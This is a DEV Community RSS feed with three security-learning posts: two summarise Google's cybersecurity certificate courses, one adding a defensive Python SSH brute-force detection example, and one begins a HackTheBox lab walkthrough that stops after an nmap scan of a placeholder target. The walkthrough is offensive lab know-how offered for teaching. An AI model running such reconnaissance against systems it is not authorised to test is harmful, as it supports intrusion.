<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: CyberZeal</title>
    <description>The latest articles on DEV Community by CyberZeal (@cyber_zeal).</description>
    <link>https://dev.to/cyber_zeal</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1544409%2F8f43faf8-d1a6-4c78-b447-fc60b29c573e.jpg</url>
      <title>DEV Community: CyberZeal</title>
      <link>https://dev.to/cyber_zeal</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/cyber_zeal"/>
    <language>en</language>
    <item>
      <title>What Googlers can teach you about Security part 2</title>
      <dc:creator>CyberZeal</dc:creator>
      <pubDate>Tue, 25 Jun 2024 17:40:10 +0000</pubDate>
      <link>https://dev.to/cyber_zeal/what-googlers-can-teach-you-about-security-part-2-1ko1</link>
      <guid>https://dev.to/cyber_zeal/what-googlers-can-teach-you-about-security-part-2-1ko1</guid>
      <description>&lt;p&gt;[TL;DR, I'm a Web Dev and I don't care about Cybersec] - go and read Open Worldwide Application Security Project (OWASP) &lt;a href="https://owasp.org/www-project-top-ten/"&gt;Top 10 Web Application Security Risks&lt;/a&gt; you &lt;strong&gt;must&lt;/strong&gt; know this stuff, if your web app runs on anything else than &lt;a href="http://127.0.0.1"&gt;http://127.0.0.1&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Previously I wrote about Google's Cybersecurity Professional program and why I enrolled in it. If you haven't already, go and read it &lt;a href="https://dev.to/cyber_zeal/what-googlers-can-teach-you-about-security-515m"&gt;here&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;If you've already read it, we continue with the second course in the series: "Play It Safe: Manage Security Risks".&lt;/p&gt;

&lt;p&gt;Again, I only focus on some of the key points; the course has a lot of content and hands-on exercises. If you are interested in how the cybersecurity industry works, explained through real-life examples from Google, you should definitely take the course. &lt;/p&gt;

&lt;p&gt;Even if you are a developer and have no interest in working in cybersec, this will give you a better picture of how your organization operates. &lt;/p&gt;

&lt;p&gt;And who knows, maybe along the way you fall in love with Cyber. ❤️ &lt;/p&gt;

&lt;h2&gt;
  
  
  Module 1
&lt;/h2&gt;

&lt;p&gt;The first module goes deeper into the eight CISSP security domains that were mentioned in the previous course/post. I will list them again because they show how vast the security industry is. You can also see the roles and some of the responsibilities associated with each domain. &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Security and Risk Management&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Chief Information Security Officer (CISO), Risk Manager, Compliance Officer.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Develop security policies and procedures.&lt;/li&gt;
&lt;li&gt;Assess and manage risks.&lt;/li&gt;
&lt;li&gt;Ensure compliance with regulations and standards.&lt;/li&gt;
&lt;li&gt;Align security practices with organizational goals.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Asset Security&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Data Owners, System Administrators, Privacy Officers.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Manage information assets (data, hardware, software).&lt;/li&gt;
&lt;li&gt;Define access controls and ownership.&lt;/li&gt;
&lt;li&gt;Protect sensitive data and enforce privacy rules.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Security architecture and engineering&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Security Architects, Systems Engineers.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Design secure systems and networks.&lt;/li&gt;
&lt;li&gt;Implement encryption, firewalls, and access controls.&lt;/li&gt;
&lt;li&gt;Evaluate security technologies.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Communication and Network Security&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Network Administrators, Security Analysts.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Secure network infrastructure (routers, switches).&lt;/li&gt;
&lt;li&gt;Implement VPNs, firewalls, and intrusion detection systems.&lt;/li&gt;
&lt;li&gt;Ensure secure data transmission.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Identity and Access Management (IAM)&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: IAM Managers, Access Control Administrators, System Administrators.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Manage user identities and access rights.&lt;/li&gt;
&lt;li&gt;Implement authentication and authorization mechanisms.&lt;/li&gt;
&lt;li&gt;Monitor user activity.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Security Assessment and Testing&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Penetration Testers, Vulnerability Assessors.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Conduct security assessments (penetration testing, vulnerability scanning).&lt;/li&gt;
&lt;li&gt;Identify weaknesses and recommend improvements.&lt;/li&gt;
&lt;li&gt;Validate security controls.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Security Operations&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Security Analysts, Incident Responders.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Monitor security events and incidents.&lt;/li&gt;
&lt;li&gt;Investigate breaches and coordinate responses.&lt;/li&gt;
&lt;li&gt;Manage security incidents and recovery.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Software Development Security&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Roles: Software Developers, Security Champions.&lt;/li&gt;
&lt;li&gt;Responsibilities:

&lt;ul&gt;
&lt;li&gt;Write secure code.&lt;/li&gt;
&lt;li&gt;Perform code reviews for vulnerabilities.&lt;/li&gt;
&lt;li&gt;Build security into every phase of the software development lifecycle.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Risk management
&lt;/h3&gt;

&lt;p&gt;You must keep your assets secure! Assets can be digital or physical - personal information of customers, trade secrets, servers, confidential documents… &lt;/p&gt;

&lt;p&gt;The &lt;a href="https://csrc.nist.gov/projects/risk-management/about-rmf"&gt;&lt;strong&gt;NIST Risk Management Framework (RMF)&lt;/strong&gt;&lt;/a&gt; is a comprehensive, flexible, and repeatable 7-step process that organizations can use to manage information security and privacy risk. &lt;/p&gt;

&lt;p&gt;The 7 steps are:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Prepare&lt;/strong&gt;: Talk to key stakeholders and prepare a broad risk management strategy.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Categorize&lt;/strong&gt;: Analyze the system, categorize the data, and do an impact analysis.
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Select&lt;/strong&gt;: Choose NIST SP 800-53 controls based on risk assessment.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Implement&lt;/strong&gt;: Deploy controls and document their deployment.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Assess&lt;/strong&gt;: Verify control effectiveness.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Authorize&lt;/strong&gt;: A senior official reviews the assessed risk and formally authorizes the system to operate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor&lt;/strong&gt;: Continuously monitor control implementation and risks.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You can see list of cybersecurity risks &lt;a href="https://www.nist.gov/itl/smallbusinesscyber/cybersecurity-basics/cybersecurity-risks"&gt;here&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;Also there is a famous &lt;a href="https://owasp.org/www-project-top-ten/"&gt;OWASP top 10 security risks&lt;/a&gt; for web applications. &lt;strong&gt;&lt;u&gt;If you are a web dev you should really really get acquainted with this list.&lt;/u&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can see how the top list changes through time. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3a4sd79so8dh7zq2yp75.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3a4sd79so8dh7zq2yp75.png" alt="OWASP Top 10 Risks" width="800" height="400"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Image credit Google Cybersecurity Professional Program&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Module 2
&lt;/h2&gt;

&lt;p&gt;We already mentioned the CIA triad in the previous post, but it is so crucial that we will expand on it a bit here. The way I see it, whatever assessment you do in security, be it application threat modeling, an infrastructure security review or a risk assessment, you are thinking about these three things:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Confidentiality&lt;/strong&gt; - Who can access what? We need to ensure that only authorized users can access specific parts of the system and the data in it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Integrity&lt;/strong&gt; - No one should be able to tamper with your system or its data unnoticed. And if someone does, you should know about it. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Availability&lt;/strong&gt; - Systems and data should be available to authorized users when they need them. &lt;/p&gt;

&lt;p&gt;The rest of the module goes deeper into OWASP and the NIST Cybersecurity Framework. The first hands-on exercise is also here: you conduct a security audit of a fictional small company that recently had an increase in business. It is really well made, and you see how everything you learned so far is applied in the real world. &lt;/p&gt;

&lt;h2&gt;
  
  
  Module 3
&lt;/h2&gt;

&lt;p&gt;This module goes in depth on Security Information and Event Management (SIEM) tools. A SIEM aggregates event streams from across the organization (network logs, application logs, authentication logs and so on), normalizes them, and runs correlation rules over them; when something anomalous starts happening, it raises an alert for an analyst. &lt;/p&gt;

&lt;p&gt;A picture is worth a thousand words, and a video is... a thousand words per frame, I guess... So you can go and check IBM's 4-minute &lt;a href="https://www.youtube.com/watch?v=9RfsRn7m7OE"&gt;video&lt;/a&gt; about this, if you are interested. Or do a web search on Splunk to see what one of the most widely used SIEM solutions looks like. &lt;/p&gt;

&lt;p&gt;There is also a thing called &lt;strong&gt;Security orchestration, automation, and response (SOAR)&lt;/strong&gt;, which some consider to be the future of SIEM, or at least a complement to it: it automates the repetitive response tasks that SIEM alerts generate. More about it &lt;a href="https://www.youtube.com/watch?v=k7ju95jDxFA"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Module 4
&lt;/h2&gt;

&lt;p&gt;So, your SIEM detected an intrusion. What do you do? Don't panic: if you work in a serious organization, you have a Playbook. If you don't have a Playbook? Well, then you can panic. 😅&lt;/p&gt;

&lt;p&gt;The last module is about Playbooks. But what is a Playbook, you ask? &lt;/p&gt;

&lt;p&gt;A Playbook is a manual that tells you exactly what you need to do, and with which tools, in response to a security incident. &lt;/p&gt;

&lt;p&gt;Playbooks ensure a consistent list of actions is followed, regardless of who is handling the case.&lt;/p&gt;

&lt;p&gt;Different types of playbooks exist, including those for incident response, security alerts, team-specific, and product-specific purposes.&lt;/p&gt;

&lt;p&gt;Here, we'll focus on a commonly used cybersecurity playbook, the incident response playbook. Incident response involves quickly identifying an attack, containing the damage, and correcting the effects of a breach. An incident response playbook includes six phases to help manage security incidents from start to finish. Now, while I think theory has its place, these kinds of things are best explained using real-world examples. Here is how each step might look in a concrete scenario:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;📝 &lt;strong&gt;Preparation&lt;/strong&gt;: An organization creates an incident response plan that outlines specific procedures for different types of incidents (e.g., data breaches, DDoS attacks, malware outbreaks). They identify key personnel responsible for incident response, establish communication channels, and conduct regular tabletop exercises to ensure everyone knows their roles.&lt;/li&gt;
&lt;li&gt;🔍 &lt;strong&gt;Detection and Analysis&lt;/strong&gt;: A security operations center (SOC) detects unusual network traffic patterns indicating a potential intrusion. Analysts investigate the incident, analyze logs, and use threat intelligence feeds to determine if the activity is malicious. They identify the affected systems and assess the impact.&lt;/li&gt;
&lt;li&gt;🔒 &lt;strong&gt;Containment&lt;/strong&gt;: Upon confirming a data breach, the incident response team isolates compromised servers from the network to prevent further spread. They disable compromised user accounts and block malicious IP addresses. The goal is to limit the attacker’s access and prevent additional damage.&lt;/li&gt;
&lt;li&gt;👊 &lt;strong&gt;Eradication and Recovery&lt;/strong&gt;: After identifying a ransomware attack, the organization removes the malware from affected systems. They restore data from backups and patch vulnerabilities that allowed the initial infection. The recovery process involves verifying system integrity and ensuring all services are operational.&lt;/li&gt;
&lt;li&gt;☕ &lt;strong&gt;Post-Incident Activity&lt;/strong&gt;: The incident response team conducts a postmortem analysis of a successful phishing attack. They document the attack vector, identify gaps in security controls, and recommend improvements. Leadership reviews the findings, and the organization updates its security policies and provides additional user training.&lt;/li&gt;
&lt;li&gt;☎️ &lt;strong&gt;Coordination&lt;/strong&gt;: This involves reporting incidents and sharing information throughout the response process based on established standards. Coordination ensures compliance requirements are met and allows for a coordinated response and resolution.&lt;/li&gt;
&lt;/ol&gt;
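&lt;p&gt;To make two of these ideas concrete, here is an added example (my own illustration, not code from the course or from this post): a toy SIEM correlation rule of the kind described in Module 3, run over a few constructed sshd log lines, followed by a SOAR-style dry run of the Containment step above (block the source IP, disable the compromised account, isolate the host). The log lines, the hostname web01, the IP addresses, the threshold of five failures in sixty seconds, the assumed year 2024 and the action names are all assumptions made up for the example; a real SIEM would pull normalized events from its log pipeline, and a real SOAR connector would call the firewall and identity provider APIs instead of returning tuples.&lt;/p&gt;

```python
"""Toy SIEM correlation rule plus a SOAR-style playbook step (added example).

Rule: five or more failed SSH logins from one source IP inside a sixty-second
sliding window raise a brute-force alert; an accepted login from that IP
afterwards escalates it. playbook_actions() is the Containment step of the
incident-response playbook as a dry run: it returns the actions it would take
and executes nothing.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd-style log lines for the example; not from a real system.
# Syslog lines carry no year, so parse_line() assumes one (see below).
SAMPLE_LOGS = """\
Jun 25 17:40:01 web01 sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2
Jun 25 17:40:03 web01 sshd[1202]: Failed password for root from 203.0.113.7 port 51240 ssh2
Jun 25 17:40:04 web01 sshd[1203]: Failed password for root from 203.0.113.7 port 51241 ssh2
Jun 25 17:40:05 web01 CRON[1300]: (root) CMD (run-parts /etc/cron.hourly)
Jun 25 17:40:06 web01 sshd[1204]: Failed password for root from 203.0.113.7 port 51244 ssh2
Jun 25 17:40:07 web01 sshd[1205]: Failed password for root from 203.0.113.7 port 51250 ssh2
Jun 25 17:40:09 web01 sshd[1206]: Accepted password for root from 203.0.113.7 port 51252 ssh2
Jun 25 17:41:10 web01 sshd[1207]: Failed password for alice from 198.51.100.4 port 40001 ssh2
Jun 25 17:55:00 web01 sshd[1208]: Failed password for alice from 198.51.100.4 port 40002 ssh2
Jun 25 17:56:30 web01 sshd[1209]: Accepted password for alice from 198.51.100.4 port 40003 ssh2
"""

# Groups: 1 timestamp, 2 host, 3 Failed|Accepted, 4 user, 5 source IP.
LINE_RE = re.compile(
    r"^(\w{3} +\d{1,2} \d\d:\d\d:\d\d) (\S+) sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def parse_line(line, year=2024):
    """Normalize one sshd auth line into an event dict, or None if it is not one."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "host": m.group(2), "result": m.group(3),
            "user": m.group(4), "ip": m.group(5)}


def correlate(lines, threshold=5, window=timedelta(seconds=60)):
    """Run the brute-force rule over log lines; return alerts in detection order."""
    failures = defaultdict(deque)   # source IP -> timestamps of recent failures
    flagged = {}                    # source IP -> brute-force alert already raised
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip = ev["ip"]
        if ev["result"] == "Failed":
            recent = failures[ip]
            recent.append(ev["ts"])
            while ev["ts"] - recent[0] > window:   # expire failures outside the window
                recent.popleft()
            if len(recent) >= threshold and ip not in flagged:
                alert = {"rule": "ssh_bruteforce", "severity": "medium", "ip": ip,
                         "host": ev["host"], "user": None, "first_seen": recent[0],
                         "last_seen": ev["ts"], "count": len(recent)}
                flagged[ip] = alert
                alerts.append(alert)
        elif ip in flagged:
            # A success right after a burst of failures: assume the guess landed.
            prior = flagged[ip]
            alerts.append({"rule": "ssh_bruteforce_success", "severity": "high", "ip": ip,
                           "host": ev["host"], "user": ev["user"],
                           "first_seen": prior["first_seen"], "last_seen": ev["ts"],
                           "count": prior["count"]})
    return alerts


def playbook_actions(alerts):
    """Containment step as SOAR automation (dry run): returns (action, target) pairs."""
    actions = []
    for a in alerts:
        actions.append(("block_ip", a["ip"]))
        if a["rule"] == "ssh_bruteforce_success":
            actions.append(("disable_account", a["user"]))
            actions.append(("isolate_host", a["host"]))
            actions.append(("page_oncall", f"{a['user']}@{a['host']} from {a['ip']}"))
    return list(dict.fromkeys(actions))   # de-duplicate, keep order


if __name__ == "__main__":
    found = correlate(SAMPLE_LOGS.splitlines())
    for a in found:
        print(f"[{a['severity']}] {a['rule']} ip={a['ip']} user={a['user']} count={a['count']}")
    for action, target in playbook_actions(found):
        print(f"  would run: {action} {target}")
```

&lt;p&gt;On the sample above the rule fires once for 203.0.113.7 after its fifth failure and escalates when the following login succeeds, while alice's two failures fourteen minutes apart never meet the threshold. That second case is why the window matters: without it, a legitimate user who mistypes their password a few times a week would eventually trip the rule too. The order of the actions mirrors the Containment step in the playbook: cut the attacker's path in first, then the account they used, then the host they reached.&lt;/p&gt;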

&lt;p&gt;Again, there were a lot of other things, but you get the idea. Feel free to ping me in the comments.&lt;/p&gt;

&lt;p&gt;Stay safe! &lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>certification</category>
      <category>google</category>
    </item>
    <item>
      <title>What Googlers can teach you about Security</title>
      <dc:creator>CyberZeal</dc:creator>
      <pubDate>Wed, 19 Jun 2024 15:13:13 +0000</pubDate>
      <link>https://dev.to/cyber_zeal/what-googlers-can-teach-you-about-security-515m</link>
      <guid>https://dev.to/cyber_zeal/what-googlers-can-teach-you-about-security-515m</guid>
      <description>&lt;p&gt;TL;DR: just go watch &lt;a href="https://www.youtube.com/playlist?list=PL590L5WQmH8dsxxz7ooJAgmijwOz0lh2H"&gt;Hacking Google&lt;/a&gt;. Google made few superbly produced episodes about times they got hacked. &lt;/p&gt;

&lt;p&gt;Curious about what Googlers can teach you about Cyber Security? Then read on!&lt;/p&gt;

&lt;p&gt;Some time ago I stepped into a Security role in my company, after almost 10 years of working as a developer. How and why that happened will be explained in another blog post; for now the only thing that you need to know is that I'm something between a Security Manager and a Security Engineer for a huge product that has 100+ people spanning multiple teams. &lt;/p&gt;

&lt;p&gt;Now, I had a Security bootcamp, and then internal Security training lasting almost a year and a half. For some reason I was thinking that, plus picking things up as I go, would be enough, but boy was I wrong. Every few weeks we were spending a week covering a completely different topic, and this program was tailored to my company's specific needs (which are very broad given that this is a 100k+ employee software company). &lt;/p&gt;

&lt;p&gt;As a geek and a fan of structured learning I started exploring what my options are. I found out that college-type education won't get you far in cybersecurity, which makes sense given that this industry is sooo fast. I mean, software engineering is fast, but if you have time and money you should go to college; learning your CS stuff will do wonders for you. But Cyber is crazily fast, and as I see it (and I'm not the only one), a cybersecurity college degree has no real value IF you have a prior tech education. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;So, if you want structured learning in CyberSec, certificates are the way.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpehf2r0vwnu6r3p1vzl2.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpehf2r0vwnu6r3p1vzl2.gif" alt="Image description" width="498" height="280"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There are famous and advanced ones such as &lt;a href="https://www.offsec.com"&gt;OffSec&lt;/a&gt; and &lt;a href="https://www.sans.org/emea/"&gt;SANS&lt;/a&gt;, but I wanted something that gives me an overview of the field and isn't too pricey. &lt;/p&gt;

&lt;p&gt;I concluded that Google's Cybersecurity Professional Certificate Program was the best deal, as you can get it on Coursera and it covers the topics that CompTIA Security+ covers. You also get a voucher for a 30% discount on Security+, and all that for the Coursera monthly subscription price. &lt;/p&gt;

&lt;p&gt;You can also audit the course and later come back for the paid exercises; that way you can go through all eight courses in a month. &lt;br&gt;
Not sure whether this is a sleazeball move, especially since you can apply for financial aid on Coursera. As for me, in the end I paid for the annual subscription, as I want to take some other courses too. &lt;/p&gt;

&lt;p&gt;Ok, so the Google Cybersecurity Professional Certificate Program consists of 8 courses, and its intention is to make you ready for an entry-level Security position and give you an overview of the Cyber Sec industry. &lt;/p&gt;

&lt;p&gt;Let me tell you what the first course (Foundations of Cybersecurity) is about, and in later blog posts I will cover the remaining 7.&lt;/p&gt;

&lt;p&gt;Also, one &lt;strong&gt;disclaimer&lt;/strong&gt;: I will give only the most interesting points to me. &lt;/p&gt;

&lt;h4&gt;
  
  
  Module 1
&lt;/h4&gt;

&lt;p&gt;This module is essentially getting you hyped for Cyber Sec. The production of the whole program is great, btw; wouldn't expect less from Google. You get to hear from Google's sec experts what they do at Google and what your responsibilities would be as an entry-level sec analyst, and you get introduced to the terminology. Google's employees also talk about their journey to Google, which is very interesting. &lt;/p&gt;

&lt;h4&gt;
  
  
  Module 2
&lt;/h4&gt;

&lt;p&gt;This module is about historical background, the types of attacks that can happen, and understanding attackers. Here are the types of attackers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Advanced Persistent Threats (APTs):&lt;/strong&gt;  Usually state funded. Highly skilled and patient, APTs meticulously research targets (think big corporations or government agencies) and can remain undetected for long periods, aiming to steal valuable data or disrupt critical infrastructure.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Insider Threats:&lt;/strong&gt; Insider threats are authorized users who misuse their access to steal data, sabotage systems, or commit espionage.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hacktivists:&lt;/strong&gt; These are the digital activists who use hacking to promote their cause. Their targets may be governments or corporations, and their goals range from raising awareness to social change campaigns.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ethical or White Hat Hackers (Authorized Hackers):&lt;/strong&gt; Ethical hackers use their skills legally to identify vulnerabilities in systems and help organizations improve their security posture.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Researchers or Grey Hat (Semi-Authorized Hackers):&lt;/strong&gt; These guys discover weaknesses but don't exploit them. They responsibly report their findings to help improve overall security.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Unethical or Black Hat Hackers (Unauthorized Hackers):&lt;/strong&gt; Bad guys. Motivated by financial gain or simply causing trouble, they exploit vulnerabilities to steal data or disrupt systems.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Also this module introduces the CISSP 8 Security Domains:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Security and risk management&lt;/strong&gt; - focuses on defining security goals and objectives, risk mitigation, compliance, business continuity, and the law. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Asset security&lt;/strong&gt; - focuses on securing digital and physical assets. It's also related to the storage, maintenance, retention, and destruction of data. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security architecture and engineering&lt;/strong&gt; - focuses on optimizing data security by ensuring effective tools, systems, and processes are in place. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Communication and network security&lt;/strong&gt; - focuses on managing and securing physical networks and wireless communications.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Identity and access management&lt;/strong&gt; - focuses on keeping data secure, by ensuring users follow established policies to control and manage physical assets, like office spaces, and logical assets, such as networks and applications. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security assessment and testing&lt;/strong&gt; - focuses on conducting security control testing, collecting and analyzing data, and conducting security audits to monitor for risks, threats, and vulnerabilities. &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security operations&lt;/strong&gt; - focuses on conducting investigations and implementing preventative measures.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Software development security&lt;/strong&gt; - focuses on using secure coding practices, which are a set of recommended guidelines that are used to create secure applications and services. &lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  Module 3
&lt;/h4&gt;

&lt;p&gt;This one is about frameworks. Funny story, I often heard Security guys mentioning CIA, and I was like “I’m pretty sure they are not talking about &lt;em&gt;that&lt;/em&gt; CIA”. Well, here I learned that CIA stands for &lt;strong&gt;Confidentiality, Integrity, and Availability&lt;/strong&gt;, which is a foundational model for Cyber Security. &lt;/p&gt;

&lt;p&gt;There are various frameworks but you may have heard about &lt;a href="https://www.nist.gov/cyberframework"&gt;NIST Cybersecurity Framework&lt;/a&gt;. &lt;/p&gt;

&lt;h4&gt;
  
  
  Module 4
&lt;/h4&gt;

&lt;p&gt;This module is about tools that cybersecurity people use: &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Security information and event management (SIEM)&lt;/strong&gt; - application that collects and analyzes log data to monitor critical activities in an organization.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Network protocol analyzers (packet sniffers)&lt;/strong&gt; - &lt;strong&gt;network protocol analyzer&lt;/strong&gt;, also known as a &lt;strong&gt;packet sniffer&lt;/strong&gt;, is a tool designed to capture and analyze data traffic in a network. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Playbooks&lt;/strong&gt; - playbook is a manual that provides details about any operational action, such as how to respond to a security incident. &lt;/p&gt;

&lt;p&gt;And others which weren’t anything new to me were mentioned: Linux, SQL, Python.&lt;/p&gt;

&lt;p&gt;There was &lt;strong&gt;a lot of other stuff&lt;/strong&gt; but these were the things most interesting to me. &lt;br&gt;
Stay tuned for next Course in the Program: &lt;strong&gt;&lt;em&gt;Play It Safe: Manage Security Risks&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Also, if you have any questions about the program, feel free to ping me in the comments. &lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>certification</category>
      <category>google</category>
    </item>
    <item>
      <title>Hacking a Server in Three Acts</title>
      <dc:creator>CyberZeal</dc:creator>
      <pubDate>Thu, 30 May 2024 13:24:49 +0000</pubDate>
      <link>https://dev.to/cyber_zeal/hacking-a-server-in-three-acts-31m2</link>
      <guid>https://dev.to/cyber_zeal/hacking-a-server-in-three-acts-31m2</guid>
      <description>&lt;p&gt;So, I got on this path of Cybersecurity after 10 years of working in industry as a Full Stack Java Developer. How and why that happened will be covered in another blog post. For our story today, only thing that you need to know is that at some point in my journey of learning about Security, I stumbled upon HackTheBox platform. &lt;/p&gt;

&lt;p&gt;The HTB platform is about teaching you to hack into servers (boxes). And, man, not only is their content superb, but the design and UX are amazing... Long story short, I got hooked and started with the first course &lt;code&gt;Cracking Into HTB&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;They show you various techniques, and in the end you get the IP of a box that you need to hack into by applying everything you learned. You also get a VM running Parrot Security OS (ParrotSec), a Linux distro preloaded with tools for hacking/pentesting. It was super thrilling, and here is how it went: &lt;/p&gt;

&lt;h2&gt;
  
  
  Act I: Reconnaissance
&lt;/h2&gt;

&lt;p&gt;First we need to see what's going on with the server: what ports are open and what OS and other software is running there. I wrote down the IPs of the target and of my VM because they will be used often. I ran &lt;code&gt;nmap &amp;lt;TARGET_IP&amp;gt;&lt;/code&gt;, which performs a quick scan of the 1,000 most common TCP ports. It returned 80 and 443, the default ports for HTTP and HTTPS. &lt;/p&gt;

